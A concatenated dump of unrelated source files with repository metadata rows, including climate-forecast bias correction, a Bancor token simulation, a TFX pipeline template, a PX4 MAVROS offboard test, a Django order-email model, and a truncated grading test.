- modified quantile mapping: https://www.sciencedirect.com/science/article/abs/pii/S0034425716302000?via%3Dihub
- scaled distribution mapping (Gamma and Normal Corrections): https://www.hydrol-earth-syst-sci.net/21/2649/2017/
"""
corrected = []
seasonality = OPTIONS["seasonality"]
dim = "time"
if seasonality == "weekofyear":
forecast = convert_cftime_to_datetime_coords(forecast, dim)
observations = convert_cftime_to_datetime_coords(observations, dim)
if train_test_split in ["fair"]:
if alignment in ["same_inits", "maximize"]:
train_dim = train_init.rename({"init": "time"})
# shift init to time
n, freq = get_lead_cftime_shift_args(
forecast.lead.attrs["units"], forecast.lead
)
train_dim = shift_cftime_singular(train_dim[dim], n, freq)
data_to_be_corrected = forecast.drop_sel({dim: train_dim})
elif alignment in ["same_verif"]:
train_dim = train_time
intersection = (
train_dim[dim].to_index().intersection(forecast[dim].to_index())
)
data_to_be_corrected = forecast.drop_sel({dim: intersection})
intersection = (
train_dim[dim].to_index().intersection(forecast[dim].to_index())
)
forecast = forecast.sel({dim: intersection})
reference = observations.sel({dim: intersection})
else:
model = forecast
data_to_be_corrected = forecast
reference = observations
data_to_be_corrected_ori = data_to_be_corrected.copy()
for label, group in forecast.groupby(f"{dim}.{seasonality}"):
reference = observations.sel({dim: group[dim]})
model = forecast.sel({dim: group[dim]})
if train_test_split in ["unfair", "unfair-cv"]:
# take all
data_to_be_corrected = forecast.sel({dim: group[dim]})
else:
group_dim_data_to_be_corrected = (
getattr(data_to_be_corrected_ori[dim].dt, seasonality) == label
)
data_to_be_corrected = data_to_be_corrected_ori.sel(
{dim: group_dim_data_to_be_corrected}
)
if cv == "LOO" and train_test_split == "unfair-cv":
reference = leave_one_out(reference, dim)
model = leave_one_out(model, dim)
data_to_be_corrected = leave_one_out(data_to_be_corrected, dim)
dim2 = "time_member"
if "member" in model.dims:
reference = reference.broadcast_like(model)
data_to_be_corrected = data_to_be_corrected.broadcast_like(model)
model = model.stack({dim2: ["time", "member"]})
reference = reference.stack({dim2: ["time", "member"]})
data_to_be_corrected = data_to_be_corrected.stack(
{dim2: ["time", "member"]}
)
dim_used = dim2 if "member" in forecast.dims else dim
# using bias-correction: https://github.com/pankajkarman/bias_correction/blob/master/bias_correction.py
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
bc = XBiasCorrection(
reference,
model,
data_to_be_corrected,
dim=dim_used,
)
c = bc.correct(method=method, join="outer", **metric_kwargs)
if dim2 in c.dims:
c = c.unstack(dim2)
if cv and dim in c.dims and "sample" in c.dims:
c = c.mean(dim)
c = c.rename({"sample": dim})
# select only where data_to_be_corrected was input
if dim2 in data_to_be_corrected.dims:
data_to_be_corrected = data_to_be_corrected.unstack(dim2)
c = c.sel({dim: data_to_be_corrected[dim]})
corrected.append(c)
corrected = xr.concat(corrected, dim).sortby(dim)
# convert back to CFTimeIndex if needed
if isinstance(corrected[dim].to_index(), pd.DatetimeIndex):
corrected = convert_time_index(corrected, dim, "hindcast")
return corrected
bc = Metric(
"bias_correction", bc_func, positive=False, probabilistic=False, unit_power=1
)
# calculate bias lead-time dependent
bias_removed_hind = hindcast.verify(
metric=bc,
comparison="m2o" if "member" in hindcast.dims else "e2o",
dim=[], # set internally inside bc
alignment=alignment,
cv=cv,
**metric_kwargs,
).squeeze(drop=True)
# remove groupby label from coords
for c in GROUPBY_SEASONALITIES + ["skill"]:
if c in bias_removed_hind.coords and c not in bias_removed_hind.dims:
del bias_removed_hind.coords[c]
# keep attrs
bias_removed_hind.attrs = hindcast.get_initialized().attrs
for v in bias_removed_hind.data_vars:
bias_removed_hind[v].attrs = hindcast.get_initialized()[v].attrs
# replace raw with bias reducted initialized dataset
hindcast_bias_removed = hindcast.copy()
hindcast_bias_removed._datasets["initialized"] = bias_removed_hind
return hindcast_bias_removed
def xclim_sdba(
hindcast,
alignment,
cv=False,
how="DetrendedQuantileMapping",
train_test_split="fair",
train_time=None,
train_init=None,
**metric_kwargs,
):
"""Calc bias based on grouper to be passed as metric_kwargs and remove bias from py:class:`~climpred.classes.HindcastEnsemble`.
See climpred.constants.XCLIM_BIAS_CORRECTION_METHODS for implemented methods for ``how``.
Args:
hindcast (HindcastEnsemble): hindcast.
alignment (str): which inits or verification times should be aligned?
- maximize/None: maximize the degrees of freedom by slicing ``hind`` and
``verif`` to a common time frame at each lead.
- same_inits: slice to a common init frame prior to computing
metric. This philosophy follows the thought that each lead should be
based on the same set of initializations.
- same_verif: slice to a common/consistent verification time frame prior
to computing metric. This philosophy follows the thought that each lead
should be based on the same set of verification dates.
how (str): not used
cv (bool): Use cross validation in removal function. This
excludes the given initialization from the bias calculation. With False,
include the given initialization in the calculation, which is much faster
but yields similar skill with a large N of initializations.
Defaults to True.
Returns:
HindcastEnsemble: bias removed hindcast.
"""
def bc_func(
forecast,
observations,
dim=None,
method=how,
cv=False,
**metric_kwargs,
):
"""Wrapping https://github.com/Ouranosinc/xclim/blob/master/xclim/sdba/adjustment.py.
Functions to perform bias correction of datasets to remove biases across datasets. See climpred.constants.XCLIM_BIAS_CORRECTION_METHODS for implemented methods.
"""
seasonality = OPTIONS["seasonality"]
dim = "time"
if seasonality == "weekofyear":
forecast = convert_cftime_to_datetime_coords(forecast, dim)
observations = convert_cftime_to_datetime_coords(observations, dim)
if train_test_split in ["fair"]:
if alignment in ["same_inits", "maximize"]:
train_dim = train_init.rename({"init": "time"})
# shift init to time
n, freq = get_lead_cftime_shift_args(
forecast.lead.attrs["units"], forecast.lead
)
train_dim = shift_cftime_singular(train_dim[dim], n, freq)
data_to_be_corrected = forecast.drop_sel({dim: train_dim})
elif alignment in ["same_verif"]:
train_dim = train_time
intersection = (
train_dim[dim].to_index().intersection(forecast[dim].to_index())
)
data_to_be_corrected = forecast.drop_sel({dim: intersection})
intersection = (
train_dim[dim].to_index().intersection(forecast[dim].to_index())
)
forecast = forecast.sel({dim: intersection})
model = forecast
reference = observations.sel({dim: intersection})
else:
model = forecast
data_to_be_corrected = forecast
reference = observations
if train_test_split in ["unfair", "unfair-cv"]:
# take all
data_to_be_corrected = forecast
if cv == "LOO" and train_test_split == "unfair-cv":
reference = leave_one_out(reference, dim)
model = leave_one_out(model, dim)
data_to_be_corrected = leave_one_out(data_to_be_corrected, dim)
if "group" not in metric_kwargs:
metric_kwargs["group"] = dim + "." + OPTIONS["seasonality"]
elif metric_kwargs["group"] is None:
metric_kwargs["group"] = dim + "." + OPTIONS["seasonality"]
if "init" in metric_kwargs["group"]:
metric_kwargs["group"] = metric_kwargs["group"].replace("init", "time")
if "member" in model.dims:
metric_kwargs["add_dims"] = ["member"]
if "member" not in reference.dims:
reference = reference.expand_dims(member=[model.member[0]])
adjust_kwargs = {}
for k in ["interp", "extrapolation", "detrend"]:
if k in metric_kwargs:
adjust_kwargs[k] = metric_kwargs.pop(k)
def adjustment(reference, model, data_to_be_corrected):
dqm = getattr(sdba.adjustment, method).train(
reference, model, **metric_kwargs
)
data_to_be_corrected = dqm.adjust(data_to_be_corrected, **adjust_kwargs)
return data_to_be_corrected
del model.coords["lead"]
c = xr.Dataset()
for v in model.data_vars:
c[v] = adjustment(reference[v], model[v], data_to_be_corrected[v])
if cv and dim in c.dims and "sample" in c.dims:
c = c.mean(dim)
c = c.rename({"sample": dim})
# select only where data_to_be_corrected was input
corrected = c.sel({dim: data_to_be_corrected[dim]})
# convert back to CFTimeIndex if needed
if isinstance(corrected[dim].to_index(), pd.DatetimeIndex):
corrected = convert_time_index(corrected, dim, "hindcast")
return corrected
bc = Metric(
"bias_correction", bc_func, positive=False, probabilistic=False, unit_power=1
)
# calculate bias lead-time dependent
bias_removed_hind = hindcast.verify(
metric=bc,
comparison="m2o" if "member" in hindcast.dims else "e2o",
dim=[], # set internally inside bc
alignment=alignment,
cv=cv,
**metric_kwargs,
).squeeze(drop=True)
# remove groupby label from coords
for c in GROUPBY_SEASONALITIES + ["skill"]:
if c in bias_removed_hind.coords and c not in bias_removed_hind.dims:
del bias_removed_hind.coords[c]
# keep attrs
bias_removed_hind.attrs = hindcast.get_initialized().attrs
for v in bias_removed_hind.data_vars:
bias_removed_hind[v].attrs = hindcast.get_initialized()[v].attrs
# replace raw with bias reducted initialized dataset
hindcast_bias_removed = hindcast.copy()
hindcast_bias_removed._datasets["initialized"] = bias_removed_hind
return hindcast_bias_removed
| 40.0125 | 168 | 0.632858 |
795542e32271dcef46ba87f8eb306a054dbdfef3 | 4,304 | py | Python | 4cw.py | lisoleg/pybancor | bbec2b9eb650799f965dbc5981025907ecb9da37 | [
"MIT"
] | null | null | null | 4cw.py | lisoleg/pybancor | bbec2b9eb650799f965dbc5981025907ecb9da37 | [
"MIT"
] | null | null | null | 4cw.py | lisoleg/pybancor | bbec2b9eb650799f965dbc5981025907ecb9da37 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import random
slista=[]
blista=[]
plista=[]
splista=[]
jlist=[0,1,2,3]
cwlist=[0.05, 0.075, 0.08, 0.1]
totalyr=3
for j in jlist:
slista.append([])
blista.append([])
plista.append([])
splista.append([])
s0=4.96*10**8
mtop=10*10**8
stop=10**9-s0
oneday=24*60*60
oneyear=365
t=[i for i in range(1,oneyear*2*totalyr)]
bprice=bprice0=45
bprice=bprice0
b0=bnum0=10**6
realmine=0
cw=cwlist[j]
plist=[]
blist=[]
slist=[]
splist=[]
b=b0*1.0
p0=b0/(cw*s0)
percentforbancor=0.08
dotpersec=2
s=1.0*s0
newprice=p=p0
sp=s0*p0
feerate=0.05
allmine=0
buymoney=sellmoney=0
staked=0
toBP=0.5
for i in t:
l=(i/2)/(oneyear*8+2)
stakeperday=4*10**5
if staked<s:
if s>stakeperday:
staked+=stakeperday
s-=stakeperday
elif staked>stakeperday/2:
staked-=stakeperday/2
s+=stakeperday/2
mineperhalfday=(1.0*dotpersec/(2**l))*oneday/2
if allmine+mineperhalfday>mtop:
realmine=mtop-allmine
else:
realmine=mineperhalfday
allmine+=realmine
s+=realmine
newprice=b/(cw*s)
b+=realmine*percentforbancor*0.9*newprice
newprice=b/(cw*s)
bprice=bprice0*random.uniform(0.88,1.15)
if i%30==0:
buymoney=bprice*1050000.0
sellmoney=bprice*50000.0
elif i%31==0:
buymoney=bprice*800000.0
sellmoney=buymoney*random.uniform(0.9,1.78)
elif newprice>1.05:
buymoney=bprice*110000.0
sellmoney=buymoney*random.uniform(0.91,2.1)
else:
buymoney=bprice*130000.0
sellmoney=buymoney*random.uniform(0.8,1.1)
buy=buymoney*1.0/bprice
if buy<=0:
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
continue
if i%2==0:#buy
fee=buy*feerate
realbuybeforerate=buy
buyafterrate=buy-fee
token=-1*s*(1-(1+buyafterrate/b)**cw)
nowtop=s0+allmine+stop
if (s+token>nowtop):
realtoken=nowtop-s
realbuybeforerate=-1*b*(1-(1+realtoken/s)**(1/cw))
fee=realbuybeforerate*feerate
realbuy=realbuybeforerate-fee
realtoken=-1*s*(1-(1+realbuy/b)**cw)
else:
realtoken=token
realbuy=buyafterrate
s+=realtoken
b+=realbuybeforerate
#tokentobp=realtoken*feerate*toBP
#newprice=realbuybeforerate/realtoken
newprice=b/(cw*s)
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
else:#sell
sell=sellmoney/bprice/newprice
sell*=1-feerate*toBP
#btcdownmaybe=random.uniform(0.33,3)
#if btcdownmaybe>0.8 and btcdownmaybe<1.0:
# sell=sell*3
# bprice*=0.5
if sell>s:
realsell=s
else:
realsell=sell
e=b*(1-(1-realsell/s)**(1/cw))
if b<e:
newprice=b/(cw*s)
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice*10**3)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
continue
s-=realsell
reale=e*(1-feerate*toBP)
b-=reale
#if (e>0):
#newprice=reale/realsell
newprice=b/(cw*s)
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
colorlist=["red","green","yellow","grey"]
sp=plt.subplot(411)
for j in jlist:
sp.plot(t,np.array(slista[j]), color=colorlist[j])
bp=plt.subplot(412)
for j in jlist:
bp.plot(t,np.array(blista[j]), color=colorlist[j])
pp=plt.subplot(413)
for j in jlist:
pp.plot(t,np.array(plista[j]), color=colorlist[j])
spp=plt.subplot(414)
for j in jlist:
spp.plot(t,np.array(splista[j]), color=colorlist[j])
plt.legend()
pp.set_title("Price-1/2Day")
pp.set_ylabel("EOS")
p0=b0/(cwlist[0]*s0)
p3=b0/(cwlist[3]*s0)
ibo0=p0*1.8*10**8
ibo3=p3*1.8*10**8
sp.set_title("cw="+str(round(cwlist[0]*100,1))+"%-"+str(round(cwlist[3]*100,1))+"% rate="+str(round(100*percentforbancor,1))+"% fee="+str(round(100*feerate,1))+"%("+str(round(toBP*100,1))+"% to BP)\nIBO:"+str(round(ibo0/10**6,2))+"mEOS/Reserve:"+str(round(b0/ibo0*100,2))+"%-"+str(round(ibo3/10**6,2))+"mEOS/Reserve:"+str(round(b0/ibo3*100,2))+"%\nSupply-1/2Day")
sp.set_ylabel("mDOT")
bp.set_title("Reserve-1/2Day")
bp.set_ylabel("mEOS")
spp.set_title("Market Cap-1/2Day")
spp.set_ylabel("bRMB")
plt.tight_layout()
plt.show()
| 25.619048 | 363 | 0.662872 |
795544040a0f1f4d0ba64676987cfd367deebc02 | 704 | py | Python | Projective-Geometry/bergar/com.bergar.simonsen.homography/tools/IO.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | [
"Apache-2.0"
] | 12 | 2017-05-26T12:04:38.000Z | 2021-07-11T04:42:19.000Z | Projective-Geometry/bergar/com.bergar.simonsen.homography/tools/IO.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | [
"Apache-2.0"
] | null | null | null | Projective-Geometry/bergar/com.bergar.simonsen.homography/tools/IO.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | [
"Apache-2.0"
] | 4 | 2017-05-09T08:26:44.000Z | 2018-04-23T03:16:01.000Z | __author__ = 'bs'
import cv2
from config.Const import *
from tools import Utils
import numpy as np
def writeImage(I):
fName = SAVE_FOLDER + OUTPUT_IMAGE + JPG_EXTENSION
for i in range(MAX_FILES):
if not Utils.doesFileExist(fName):
cv2.imwrite(SAVE_FOLDER + fName, I)
break
else:
fName = SAVE_FOLDER + OUTPUT_IMAGE + "_" + str(i) + JPG_EXTENSION
def writeHomography(H):
fName = SAVE_FOLDER + OUTPUT_MATRIX + NPY_EXTENSION
for i in range(MAX_FILES):
if not Utils.doesFileExist(fName):
np.save(fName, H)
break;
else:
fName = SAVE_FOLDER + OUTPUT_MATRIX + "_" + str(i) + NPY_EXTENSION
| 28.16 | 78 | 0.62358 |
795545b75a3708590252f2c4216a291a8a4a49b7 | 355 | py | Python | src/aturtle/shapes/__init__.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 3 | 2019-12-23T15:25:39.000Z | 2022-02-25T22:09:49.000Z | src/aturtle/shapes/__init__.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 55 | 2019-12-27T14:05:02.000Z | 2020-02-01T09:53:42.000Z | src/aturtle/shapes/__init__.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 1 | 2020-02-25T08:18:51.000Z | 2020-02-25T08:18:51.000Z | # ----------------------------------------------------------------------------
# Python A-Turtle
# ----------------------------------------------------------------------------
# Copyright (c) Tiago Montes.
# See LICENSE for details.
# ----------------------------------------------------------------------------
from . import bitmap
from . import vector
| 35.5 | 78 | 0.242254 |
79554678b240bfc74b9a5920187d53569743b5e4 | 6,273 | py | Python | tfx/experimental/templates/penguin/pipeline/pipeline.py | ajmarcus/tfx | 28ac2be5ace31ca733f6292495f8be83484a1730 | [
"Apache-2.0"
] | null | null | null | tfx/experimental/templates/penguin/pipeline/pipeline.py | ajmarcus/tfx | 28ac2be5ace31ca733f6292495f8be83484a1730 | [
"Apache-2.0"
] | null | null | null | tfx/experimental/templates/penguin/pipeline/pipeline.py | ajmarcus/tfx | 28ac2be5ace31ca733f6292495f8be83484a1730 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX penguin template pipeline definition.
This file defines TFX pipeline and various components in the pipeline.
"""
from typing import List, Optional, Text
import tensorflow_model_analysis as tfma
from tfx import v1 as tfx
from tfx.experimental.templates.penguin.models import features
from ml_metadata.proto import metadata_store_pb2
def create_pipeline(
pipeline_name: Text,
pipeline_root: Text,
data_path: Text,
preprocessing_fn: Text,
run_fn: Text,
train_args: tfx.proto.TrainArgs,
eval_args: tfx.proto.EvalArgs,
eval_accuracy_threshold: float,
serving_model_dir: Text,
metadata_connection_config: Optional[
metadata_store_pb2.ConnectionConfig] = None,
beam_pipeline_args: Optional[List[Text]] = None,
) -> tfx.dsl.Pipeline:
"""Implements the penguin pipeline with TFX."""
components = []
# Brings data into the pipeline or otherwise joins/converts training data.
# TODO(step 2): Might use another ExampleGen class for your data.
example_gen = tfx.components.CsvExampleGen(input_base=data_path)
components.append(example_gen)
# Computes statistics over data for visualization and example validation.
statistics_gen = tfx.components.StatisticsGen(
examples=example_gen.outputs['examples'])
components.append(statistics_gen)
# Generates schema based on statistics files.
schema_gen = tfx.components.SchemaGen(
statistics=statistics_gen.outputs['statistics'], infer_feature_shape=True)
components.append(schema_gen)
# Performs anomaly detection based on statistics and data schema.
example_validator = tfx.components.ExampleValidator( # pylint: disable=unused-variable
statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
components.append(example_validator)
# Performs transformations and feature engineering in training and serving.
transform = tfx.components.Transform( # pylint: disable=unused-variable
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
preprocessing_fn=preprocessing_fn)
# TODO(step 3): Uncomment here to add Transform to the pipeline.
# components.append(transform)
# Uses user-provided Python function that implements a model using Tensorflow.
trainer = tfx.components.Trainer(
run_fn=run_fn,
examples=example_gen.outputs['examples'],
# Use outputs of Transform as training inputs if Transform is used.
# examples=transform.outputs['transformed_examples'],
# transform_graph=transform.outputs['transform_graph'],
schema=schema_gen.outputs['schema'],
train_args=train_args,
eval_args=eval_args)
# TODO(step 4): Uncomment here to add Trainer to the pipeline.
# components.append(trainer)
# Get the latest blessed model for model validation.
model_resolver = tfx.dsl.Resolver(
strategy_class=tfx.dsl.experimental.LatestBlessedModelStrategy,
model=tfx.dsl.Channel(type=tfx.types.standard_artifacts.Model),
model_blessing=tfx.dsl.Channel(
type=tfx.types.standard_artifacts.ModelBlessing)).with_id(
'latest_blessed_model_resolver')
# TODO(step 5): Uncomment here to add Resolver to the pipeline.
# components.append(model_resolver)
# Uses TFMA to compute a evaluation statistics over features of a model and
# perform quality validation of a candidate model (compared to a baseline).
eval_config = tfma.EvalConfig(
model_specs=[
tfma.ModelSpec(
signature_name='serving_default',
label_key=features.LABEL_KEY,
# Use transformed label key if Transform is used.
# label_key=features.transformed_name(features.LABEL_KEY),
preprocessing_function_names=['transform_features'])
],
slicing_specs=[tfma.SlicingSpec()],
metrics_specs=[
tfma.MetricsSpec(metrics=[
tfma.MetricConfig(
class_name='SparseCategoricalAccuracy',
threshold=tfma.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': eval_accuracy_threshold}),
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={'value': -1e-10})))
])
])
evaluator = tfx.components.Evaluator( # pylint: disable=unused-variable
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
baseline_model=model_resolver.outputs['model'],
# Change threshold will be ignored if there is no baseline (first run).
eval_config=eval_config)
# TODO(step 5): Uncomment here to add Evaluator to the pipeline.
# components.append(evaluator)
# Pushes the model to a file destination if check passed.
pusher = tfx.components.Pusher( # pylint: disable=unused-variable
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=tfx.proto.PushDestination(
filesystem=tfx.proto.PushDestination.Filesystem(
base_directory=serving_model_dir)))
# TODO(step 5): Uncomment here to add Pusher to the pipeline.
# components.append(pusher)
return tfx.dsl.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=components,
# Change this value to control caching of execution results. Default value
# is `False`.
# enable_cache=True,
metadata_connection_config=metadata_connection_config,
beam_pipeline_args=beam_pipeline_args,
)
| 41.543046 | 89 | 0.720867 |
79554691d429ac492a323bea1c35a6c1e457cc6e | 4,103 | py | Python | integrationtests/python_src/px4_it/mavros/mavros_airsim_test.py | CodexLabsLLC/PX4-Autopilot | 928f481b2e17e43e56f51a5661141761c8e88d61 | [
"BSD-3-Clause"
] | null | null | null | integrationtests/python_src/px4_it/mavros/mavros_airsim_test.py | CodexLabsLLC/PX4-Autopilot | 928f481b2e17e43e56f51a5661141761c8e88d61 | [
"BSD-3-Clause"
] | null | null | null | integrationtests/python_src/px4_it/mavros/mavros_airsim_test.py | CodexLabsLLC/PX4-Autopilot | 928f481b2e17e43e56f51a5661141761c8e88d61 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division
PKG = 'px4'
import rospy
from geometry_msgs.msg import Quaternion, Vector3
from mavros_msgs.msg import AttitudeTarget
from mavros_test_common import MavrosTestCommon
# from pymavlink import mavutil
from six.moves import xrange
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardAttctlTest(MavrosTestCommon):
"""
Tests flying in offboard control by sending attitude and thrust setpoints
via MAVROS.
For the test to be successful it needs to cross a certain boundary in time.
"""
def setUp(self):
super(MavrosOffboardAttctlTest, self).setUp()
self.att = AttitudeTarget()
self.att_setpoint_pub = rospy.Publisher(
'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)
# send setpoints in seperate thread to better prevent failsafe
self.att_thread = Thread(target=self.send_att, args=())
self.att_thread.daemon = True
self.att_thread.start()
def tearDown(self):
super(MavrosOffboardAttctlTest, self).tearDown()
#
# Helper methods
#
def send_att(self):
rate = rospy.Rate(10) # Hz
self.att.body_rate = Vector3()
self.att.header = Header()
self.att.header.frame_id = "base_footprint"
self.att.orientation = Quaternion(*quaternion_from_euler(-0.25, 0.15,
0))
self.att.thrust = 0.7
self.att.type_mask = 7 # ignore body rate
while not rospy.is_shutdown():
self.att.header.stamp = rospy.Time.now()
self.att_setpoint_pub.publish(self.att)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
#
# Test method
#
def test_attctl(self):
"""Test offboard attitude control"""
# boundary to cross
boundary_x = 200
boundary_y = 100
boundary_z = 20
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
rospy.loginfo("attempting to cross boundary | x: {0}, y: {1}, z: {2}".
format(boundary_x, boundary_y, boundary_z))
# does it cross expected boundaries in 'timeout' seconds?
timeout = 90 # (int) seconds
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
crossed = False
for i in xrange(timeout * loop_freq):
if (self.local_position.pose.position.x > boundary_x and
self.local_position.pose.position.y > boundary_y and
self.local_position.pose.position.z > boundary_z):
rospy.loginfo("boundary crossed | seconds: {0} of {1}".format(
i / loop_freq, timeout))
crossed = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(crossed, (
"took too long to cross boundaries | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
self.set_mode("AUTO.LAND", 5)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 90, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_attctl_test',
MavrosOffboardAttctlTest) | 34.771186 | 126 | 0.60468 |
79554778b027d2a1169d32de98dc9344fca45f45 | 3,645 | py | Python | orders/models.py | abhishek593/IITISOC_LaFrescoInPocket | dd91b99ea60fb2753d4715e8890c0c7dc26b8b99 | [
"MIT"
] | null | null | null | orders/models.py | abhishek593/IITISOC_LaFrescoInPocket | dd91b99ea60fb2753d4715e8890c0c7dc26b8b99 | [
"MIT"
] | null | null | null | orders/models.py | abhishek593/IITISOC_LaFrescoInPocket | dd91b99ea60fb2753d4715e8890c0c7dc26b8b99 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.mail import send_mail
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from cart.models import Cart
class Order(models.Model):
cart = models.OneToOneField(Cart, on_delete=models.CASCADE, primary_key=True)
order_id = models.CharField(max_length=40)
ORDER_STATUS_CHOICES = [
('created', 'Created'),
('prepared', 'Prepared'),
('paid', 'Paid'),
('cancelled_by_user', 'Cancelled By User'),
('cancelled_by_admin', 'Cancelled By Admin')
]
previous_status = models.CharField(max_length=30, choices=ORDER_STATUS_CHOICES, default='created')
status = models.CharField(max_length=30, choices=ORDER_STATUS_CHOICES, default='created')
timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)
total = models.PositiveIntegerField()
def __str__(self):
return self.order_id
def get_human_rep_of_status(self):
for status in self.ORDER_STATUS_CHOICES:
if self.status == status[0]:
return status[1]
return None
def add_items_back(instance):
for cart_item in instance.cart.items.all():
cart_item.item.available_quantity += cart_item.quantity
cart_item.item.save()
@receiver(post_save, sender=Order)
def send_order_mail(sender, instance, created, **kwargs):
if instance.previous_status != instance.status:
if instance.status == 'created':
subject = 'LaFresco Order received.'
message = """
Your order has been received by LaFresco Team.
We are working on it and will notify you when the order is completed.
Here is the ORDER_ID {} which you can use to contact us in case of any query.
Happy Shopping!.
""".format(instance.order_id)
send_mail(subject=subject, message=message, from_email=settings.EMAIL_HOST_USER,
recipient_list=[instance.cart.user.email], fail_silently=False)
elif instance.status == 'prepared':
subject = 'LaFresco Order prepared.'
message = """
Your order has been prepared by LaFresco Team.
In case You don't have your ORDER_ID, here it is {}.
Happy Shopping!.
""".format(instance.order_id)
send_mail(subject=subject, message=message, from_email=settings.EMAIL_HOST_USER,
recipient_list=[instance.cart.user.email], fail_silently=False)
elif instance.status == 'cancelled_by_user':
subject = 'LaFresco Order Cancelled by you.'
message = 'Your order with ORDER_ID {} has been successfully cancelled.'.format(instance.order_id)
send_mail(subject=subject, message=message, from_email=settings.EMAIL_HOST_USER,
recipient_list=[instance.cart.user.email], fail_silently=False)
add_items_back(instance)
elif instance.status == 'cancelled_by_admin':
subject = 'LaFresco Order Cancelled by store.'
message = """
Your order with ORDER_ID {} has been cancelled due to some issues.
We deeply regret the inconvenience caused.
""".format(instance.order_id)
send_mail(subject=subject, message=message, from_email=settings.EMAIL_HOST_USER,
recipient_list=[instance.cart.user.email], fail_silently=False)
add_items_back(instance)
instance.previous_status = instance.status
instance.save()
| 43.915663 | 110 | 0.653224 |
795547f348c11816797a9f419e52e1639831be2e | 2,623 | py | Python | rnbgrader/tests/test_grids.py | matthew-brett/rnbgrader | f07494f59dd0d1cb97c094ac2ea9e9d1243f0f70 | [
"BSD-2-Clause"
] | null | null | null | rnbgrader/tests/test_grids.py | matthew-brett/rnbgrader | f07494f59dd0d1cb97c094ac2ea9e9d1243f0f70 | [
"BSD-2-Clause"
] | null | null | null | rnbgrader/tests/test_grids.py | matthew-brett/rnbgrader | f07494f59dd0d1cb97c094ac2ea9e9d1243f0f70 | [
"BSD-2-Clause"
] | null | null | null | """ Test grading paths
"""
import numpy as np
from rnbgrader.chunkrunner import EvaluatedChunk
from rnbgrader.grids import full_grid, max_multi
from numpy.testing import assert_array_equal
def test_full_grid():
# Test calculation of grid from results, answers. An answer returns marks
# from a result. Results are sequences of EvaluatedChunks. A evaluated
# chunk is the association of (chunk, result). The grid contains NaN where
# the result has not been compared to the answer, and a mark otherwise. A
# full grid compares all evaluated chunks to all answers.
answers = [lambda x : 11 if x.results == [1] else 0,
lambda x : 12 if x.results == [2] else 0,
lambda x : 13 if x.results == [3] else 0,
lambda x : 14 if x.results == [4] else 0]
ev_chunks = [EvaluatedChunk(*t) for t in (
(None, [1]), (None, [2]), (None, [3]), (None, [4]))]
grid = full_grid(answers, ev_chunks)
assert np.all(grid == np.diag([11, 12, 13, 14]))
grid = full_grid(answers, ev_chunks[::-1])
assert np.all(grid == np.fliplr(np.diag([11, 12, 13, 14])))
grid = full_grid(answers[::-1], ev_chunks)
assert np.all(grid == np.fliplr(np.diag([14, 13, 12, 11])))
grid = full_grid(answers[::-1], ev_chunks[::-1])
assert np.all(grid == np.diag([14, 13, 12, 11]))
ev_chunks[2].results = None
grid = full_grid(answers, ev_chunks)
np.testing.assert_array_equal(grid, [[11, 0, 0, 0],
[0, 12, 0, 0],
